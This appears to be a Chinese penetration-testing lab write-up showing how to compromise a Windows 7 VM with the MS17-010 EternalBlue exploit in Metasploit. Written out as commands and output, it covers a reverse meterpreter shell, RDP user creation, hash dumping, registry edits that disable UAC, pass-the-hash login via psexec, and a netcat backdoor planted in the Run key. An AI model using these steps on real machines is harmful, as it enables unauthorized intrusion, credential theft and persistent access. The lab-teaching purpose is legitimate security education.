使用ms17-010永恒之蓝漏洞对win7进行渗透
使用ms17-010永恒之蓝漏洞对win7进行渗透
一、实验目的:
- 利用ms17-010永恒之蓝漏洞对win7进行渗透;
- 利用enable_rdp脚本开启远程桌面并创建用户;
- 关闭主机UAC防护策略并开启后门。
二、实验环境:
- win7:192.168.18.130
- Kali:192.168.18.128
三、实验原理:
永恒之蓝相关病毒,其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
四、实验步骤:
4.1 利用ms17-010永恒之蓝漏洞对win7进行渗透
- 利用Kali扫描win7是否存在漏洞:
┌──(root㉿kali)-[~/桌面]
└─# msfconsole
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.18.130
RHOSTS => 192.168.18.130
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
注:当出现图中标注内容,说明存在永恒之蓝漏洞
- 开始利用漏洞:
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.18.130
RHOSTS => 192.168.18.130
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.18.128
LHOST => 192.168.18.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
- 查看权限:
meterpreter > getuid
4.2 利用enable_rdp脚本开启远程桌面并创建用户
RDP 概述:远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。
- 开启RDP远程桌面:
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) >
注:post/windows/manage/enable_rdp 模块可以帮我们启动目标主机的 rdp 服务,并且可以帮我 们自动创建 rdp 用户,另外还可以帮我们把目标主机的 rdp 端口映射到本地。
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/manage/enable_rdp
msf6 post(windows/manage/enable_rdp) > set username test
username => test
msf6 post(windows/manage/enable_rdp) > set password 123456
password => 123456
msf6 post(windows/manage/enable_rdp) > set session 2
session => 2
msf6 post(windows/manage/enable_rdp) > run
Kali再开一个命令窗口:
┌──(root㉿kali)-[~/桌面]
└─# rdesktop 192.168.18.130
点击”其他用户“,利用刚才创建的账号/密码登录:test/123456
4.2 关闭主机UAC防护策略并开启后门
通过 ms17-010 永恒之蓝获取到的 shell 可能会出现操作受限的情况,所以我们使用主机的账户信息建立 session 进行连接。
SAM 概述:SAM 文件即账号密码数据库文件,SAM 文件的位置是: C:\Windows\System32\config\SAM
回到msf控制台,从SAM中导出密码的哈希值
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tan:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter >
以创建的test用户为案例:
test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
注:我们需要创建一条防火墙规则允许 4444 端口访问网络,否则我们建立 session 时 payload 不能通过 4444 端口访问网络导致 session 建立失败。
回到msf控制台
meterpreter > shell
Process 3704 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\system32>netsh advfirewall firewall add rule name="test" protocol=TCP dir=out remoteport=4444 action=allow
netsh advfirewall firewall add rule name="test" protocol=TCP dir=out remoteport=4444 action=allow
ȷ����C:\Windows\system32>
显示乱码但是已经执行成功
拓展:解决乱码问题(乱码是因为 windows 和 linux 的编码不一样导致的)
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
4.3 关闭主机UAC防护策略并开启后门
UAC 概述:
用户帐户控制(User Account Control,简写作 UAC)是微软公司在其 Windows Vista 及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。
关闭UAC
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
The operation completed successfully.C:\Windows\system32>
参数说明:
ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值
-f 强制修改注册表项
关闭 UAC 远程限制,此机制有助于防止本地恶意软件以管理权限远程运行。关闭 UAC 远程限制方便黑客远程执行命令。
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
The operation completed successfully.C:\Windows\system32>exit
exitC:\Windows\system32>exit
exitC:\Windows\system32>exit
exit
meterpreter > background
[*] Backgrounding session 3...
msf6 exploit(windows/smb/ms17_010_eternalblue) >
使用hash值登录系统:
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.18.130
RHOSTS => 192.168.18.130
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.18.128
LHOST => 192.168.18.128
msf6 exploit(windows/smb/psexec) > set SMBUser test
SMBUser => test
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
SMBDomain => WORKGROUP
msf6 exploit(windows/smb/psexec) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
可以看到虽然我们使用 test 用户进行认证,但是我们同样获取到了 SYSTEM 的权限
下面我们配置一个后门程序,修改 UAC 的注册表,需要重启才能生效。
上传 nc 到 Win7
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
meterpreter >
注册表添加启动项执行 nc 反弹 shell 命令
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
Successfully set lltest_nc of REG_SZ.
meterpreter >
nc 参数解释:
L 表示用户退出连接后重新进行端口侦听
d 后台运行
p 指定端口
-e prog 程序重定向,一旦连接,就执行
meterpreter > shell
Process 1792 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\system32>
防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。
C:\Windows\system32>netsh advfirewall firewall add rule name="test443" protocol=TCP dir=in localport=443 action=allow
netsh advfirewall firewall add rule name="test443" protocol=TCP dir=in localport=443 action=allow
ȷ����C:\Windows\system32>
重启win7
C:\Windows\system32>shutdown -r -f -t 0
shutdown -r -f -t 0C:\Windows\system32>
选项说明:
-r 重启
-f 强制
-t 时间 0 表示立刻
需要用户进入系统后,我们的后门程序,才可以使用。在这个锁屏的界面,我们的后门程序还没有运行。
新建一个终端使用 nc 进行连接后门
┌──(root㉿kali)-[~/桌面]
└─# nc -v 192.168.18.130 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.18.130:443.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\SysWOW64>
msf控制台连接方法
msf6 > connect 192.168.18.130 443
[*] Connected to 192.168.18.130:443 (via: 192.168.18.128:34817)
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Windows\SysWOW64>
使用ms17-010永恒之蓝漏洞对win7进行渗透相关推荐
- kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决
两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标 ...
- Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
1.Metasploit 渗透测试框架介绍 1.基础库:metasploit 基础库文件位于源码根目录路径下的 libraries 目录中,包括Rex,framework-core 和 framewo ...
- Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循<中华人民共和国网络安全法>,共同维护清朗的网络空间 一.Metasploit(MSF)简介 Metasploit与2003年由H. ...
- 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...
- 【重要预警】“永恒之蓝”漏洞又现新木马 组成僵尸网络挖矿虚拟货币
WannaCry和UIWIX勒索软件在全世界掀起了轩然大波,但是利用"永恒之蓝"漏洞进行攻击的却不止这两个恶意软件.今日,亚信安全中国病毒响应中心发现了利用"永恒之蓝&q ...
- 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)
一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...
- linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...
- MS17-010永恒之蓝漏洞的简谈与利用
MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
最新文章
- centos yum php apc,centos – PECL APC安装 – 错误:’make’失败
- boost::lower_bound相关的测试程序
- 传统公司部署OpenStack(t版)简易介绍(八)——Dashboard模块部署
- linux mysql.h 在哪_linux mysql找不到mysql.h
- 百度首席科学家吴恩达宣布将从百度离职
- PhotoShop制作空心圆角矩形
- Android开发--apk的生成
- Python2.7升级至Python3.6
- [51单片机] 四相五线减速比为1/64步进电机驱动设计
- messagebox
- PLC编程时三个注意事项
- android7.1.2 xposed,安卓7.1 xposed框架
- Mac iOS Simulator录制Gif图
- 酒桌上的学问(搜集整理帖)
- SwiftUI 面试问题大全
- Python 进阶视频课 - 14. FR007 利率掉期定价和曲线拔靴
- mysql 分库备份_如何分表分库备份及批量恢复?MySQL
- 和我一起学Python
- 关于linux的进程中的各个线程cpu占用情况的分析和查看
- SCI论文攻略---完整版!!!!